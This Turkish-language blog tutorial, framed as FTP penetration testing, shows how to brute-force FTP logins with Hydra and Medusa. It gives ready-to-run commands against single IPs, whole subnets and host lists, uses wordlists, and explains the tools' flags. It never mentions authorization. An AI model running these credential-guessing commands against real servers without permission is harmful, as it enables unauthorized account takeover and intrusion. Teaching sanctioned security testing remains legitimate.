Ömür BOZDEMİR

ömür bozdemir github profile ömür bozdemir github profile ömür bozdemir github profile

FTP Penetration Testi Nasıl Yapılır?

Merhaba Arkadaşlar,

Bu makalemizde sizlere Hydra ve Medusa ile FTP saldırısı yapmayı anlatacağım.

Hydra İle FTP Saldırısı

Kendi hazırlamış olduğunuz yada dışardan bulmuş olduğunuz wordlist ile şifre denemeleri yapacağız.

Kendinize wordlist hazırlamak isterseniz https://www.bzdmr.com/kendi-wordlist-imi-nasil-yapabilirim-/sayfa/25 makalemizden yararlana bilirsiniz.

1.) Hangi kullanıcılar üzerinde atak yapılması istiyorsanız bunun için root/ dizini (farklı dizin) altında user.txt (farklı ad kullana bilirsiniz) dosyası oluştrumanız gerekmektedir.

touch /root/user.txt

2.) Dosyayı açıp içerisine atak yapılmasını istediğiniz kullanıcı adlarını yazınız.

nano /root/user.txt

Yada açmadanda echo komutu ile satır satır ekleye bilirsiniz.

echo admin >> /root/user.txt

3.) Hangi  ip adresine yada host adına atak yapılmasını istiyorsanız root/ dizini (farklı dizin) altında server.txt (farklı ad kullana bilirsiniz) dosyası oluştrumanız gerekmektedir.

nano /root/server.txt

Yada açmadanda echo komutu ile satır satır ekleye bilirsiniz.

echo hostname >> /root/server.txt

4.) Hazırlamış olduğumuz wordlist'imiz, user ve server dosyları ile artık saldırıya geçe biliriz. Aşağıdaki komut ile saldırıyı başlata bilirsiniz.

hydra -P root/wordlist.txt -L /root/user.txt -M /root/server.txt ftp -t 1

Hydra ile FTP Manual Saldırısı Yapma

1.) Aşağıdaki komutla ile tek ip üzerine tek şifre ve tek kullanıcı adına saldırı yapmış olacaksınız.

hydra -p 1q2w3e4r -l user ftp://192.168.1.2

2.) Aşağıdaki komutla ile ip block üzerine tek şifre ve tek kullanıcı adına saldırı yapmış olacaksınız.

hydra -p 1q2w3e4r -l user ftp://192.168.1.1/24

3.) Aşağıdaki komut ile ip adresi ve host adını oluşturduğunuz server.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.

hydra -p 1q2w3e4r -l user -M root/server.txt ftp

4.) Aşağıdaki komut ile oluşturduğunuz wordlist.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.

hydra -P root/wordlist.txt -l user ftp://192.168.1.1

5.) Aşağıdaki komutla birlikte ip block ve oluşturduğunuz wordlist.txt dosyası haricinde diğerlerini manual olarak yazarak saldırı yapmış olacaksınız.

hydra -P root/wordlist.txt -l user ftp://domain.com -t 1

Medusa ile FTP Saldırısı Yapma

Yukarıda yapılan işlemler medusa’da, da aynı şekilde geçerlidir sadece birkaç komut değişikliği vardır. Sizlere medusa üzerinden FTP saldırısı için bir kaç örnek kodlar vereceğim.

medusa -h 192.168.1.1 -u root -P root/wordlist.txt -n 21 -M ftp
medusa -H root/server.txt -u root -P root/wordlist.txt -n 21 -M ftp

Ayrıca sizlere medusa üzerinde kullanabileceğiniz komutlardan bahsetmek istiyorum komutlar ve kullanım şekilleri aşağıdaki gibidir;

-h komutu hostname / ip olarak geçiyor bu komut yerine -H komutunu kullanırsanız dosya ile tarama yaparsınız. Örnek olarak -H /root/server.txt

-M komutu  modül seçimi yapmanızaı sağlar örneğin FTP olarak varsayımda -M ftp komutu ile ftp modülü üzerinden saldırı yapmış olursunuz.

Diğer tüm modülleri görüntüleye bilmek için medusa -d komutunu kullanmanız yeterli olacaktır.

-n komutu port numarası belirlemine olanak sağlar örnek olarak -n 21 komutu ile 21. porta saldırı yapılacağını belirtmiş oluyorsunuz. 

-P komutu oluşturduğunuz wordlist'i seçmenize olanak sağlar. Bunun yerine manual olarak -p 1q2w3e4r komutu ile manual olarak belirlediğiniz şifre ile saldırı denemesi yapmış olursunuz.

Bir başka makalede görüşmek dileği ile...